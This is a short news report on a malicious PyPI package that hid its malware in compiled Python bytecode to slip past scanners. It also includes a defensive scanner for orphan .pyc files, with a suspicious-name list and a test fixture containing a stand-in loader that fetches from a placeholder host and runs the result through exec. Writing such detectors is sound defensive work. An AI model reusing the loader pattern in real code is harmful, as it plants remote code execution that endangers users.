
This malicious PyPI package mixed source and compiled code to dodge detection
2023-06-02 06:24

ReversingLabs detected a Python package in April that mixed malware with compiled code as a way to evade detection by security tools that only check source code files and not compiled output.

It's a worrying threat given the increasing number of attacks not only on PyPI but other open source code repositories like GitHub, NPM, and RubyGems.

Miscreants are trying to slip malicious code into packages via these platforms in hopes that developers will grab one and inadvertently put the bad code into their software.

Unlike the source code a developer writes, compiled Python bytecode (the .pyc files the interpreter produces) is a machine-oriented representation that is easy for the interpreter to load and execute but difficult for a human reviewer to read.

Most security tools also don't typically analyze compiled bytecode when inspecting packages, which is "why malware hidden inside the Python compiled byte code could slip under the radar of the traditional security solutions," according to ReversingLabs researcher Karlo Zanki.
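The gap described above is straightforward to close in a package-inspection pipeline: treat every .pyc in an artifact as code worth inspecting, not as a build by-product. The following is an added example, not ReversingLabs' tooling or anything from the original article. It builds a constructed package in a temporary directory (a benign module compiled into __pycache__ next to its source, and an "orphan" full.pyc whose .py has been removed, mimicking the source-plus-bytecode mix the article describes), then scans the tree: it flags bytecode that has no matching source file, unmarshals each code object, and walks the nested code objects for suspicious names and embedded URLs. The host "example.invalid" and the indicator list are assumptions for the demonstration; the .pyc header layout assumed is the 16-byte format used by CPython 3.7 and later.

```python
import importlib.util
import marshal
import os
import py_compile
import tempfile
import textwrap
import types

# Assumed indicator set for the demo: names that commonly appear in a
# downloader/loader stage (dynamic code execution, decoding, network fetch).
SUSPICIOUS_NAMES = {
    "exec", "eval", "compile", "__import__",
    "b64decode", "urlopen", "Popen", "system", "socket",
}


def expected_source(pyc_path):
    """Return the .py a .pyc should have been compiled from.

    __pycache__/mod.cpython-XY.pyc maps back to mod.py via importlib;
    a bare mod.pyc next to package code is assumed to belong to mod.py.
    """
    try:
        return importlib.util.source_from_cache(pyc_path)
    except ValueError:
        return os.path.splitext(pyc_path)[0] + ".py"


def load_code(pyc_path):
    """Unmarshal the code object from a .pyc without importing it.

    Assumes the CPython >= 3.7 header: 4-byte magic, 4-byte flags,
    8 bytes of timestamp+size (or source hash), then marshalled code.
    """
    with open(pyc_path, "rb") as fh:
        data = fh.read()
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError(f"{pyc_path}: magic does not match this interpreter")
    return marshal.loads(data[16:])


def walk_code(code):
    """Yield a code object and every code object nested in its constants."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk_code(const)


def indicators(code):
    """Collect suspicious global/attribute names and URL-like string constants."""
    names, urls = set(), set()
    for co in walk_code(code):
        names.update(n for n in co.co_names if n in SUSPICIOUS_NAMES)
        urls.update(c for c in co.co_consts
                    if isinstance(c, str) and c.startswith(("http://", "https://")))
    return names, urls


def scan_package(root):
    """Report every .pyc under root: whether its source is missing, and what it references."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".pyc"):
                continue
            pyc = os.path.join(dirpath, name)
            names, urls = indicators(load_code(pyc))
            findings.append({
                "pyc": os.path.relpath(pyc, root).replace(os.sep, "/"),
                "orphan": not os.path.exists(expected_source(pyc)),
                "names": sorted(names),
                "urls": sorted(urls),
            })
    return sorted(findings, key=lambda f: f["pyc"])


def build_sample_package(root):
    """Constructed test fixture: a package mixing plain source with an orphan .pyc."""
    pkg = os.path.join(root, "pkg")
    os.makedirs(pkg, exist_ok=True)
    with open(os.path.join(pkg, "__init__.py"), "w") as fh:
        fh.write("from .full import init\n")          # looks harmless in source review
    util_py = os.path.join(pkg, "util.py")
    with open(util_py, "w") as fh:
        fh.write("def add(a, b):\n    return a + b\n")
    py_compile.compile(util_py, doraise=True)        # benign: source kept, pyc in __pycache__
    full_py = os.path.join(pkg, "full.py")
    with open(full_py, "w") as fh:                   # constructed loader-style stage; never executed here
        fh.write(textwrap.dedent("""
            import base64, urllib.request
            def init():
                payload = urllib.request.urlopen("http://example.invalid/stage2").read()
                exec(base64.b64decode(payload))
        """))
    py_compile.compile(full_py, cfile=os.path.join(pkg, "full.pyc"), doraise=True)
    os.remove(full_py)                               # ship only the bytecode, as the malicious package did
    return pkg


if __name__ == "__main__":
    root = tempfile.mkdtemp()
    build_sample_package(root)
    for finding in scan_package(root):
        print(finding)
```

Orphan bytecode alone is not proof of malice (some vendors ship .pyc to obscure proprietary code), so the scanner reports the two signals separately and lets policy decide; a reasonable default for a registry or CI gate is to reject any artifact whose orphan .pyc references dynamic execution together with a network fetch.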

Last month, PyPI - which hosts more than 455,000 projects - saw so many attempts to create malicious accounts and packages that it temporarily suspended new user and project registration.


News URL

https://go.theregister.com/feed/www.theregister.com/2023/06/02/novel_pypi_attack_reversinglabs/
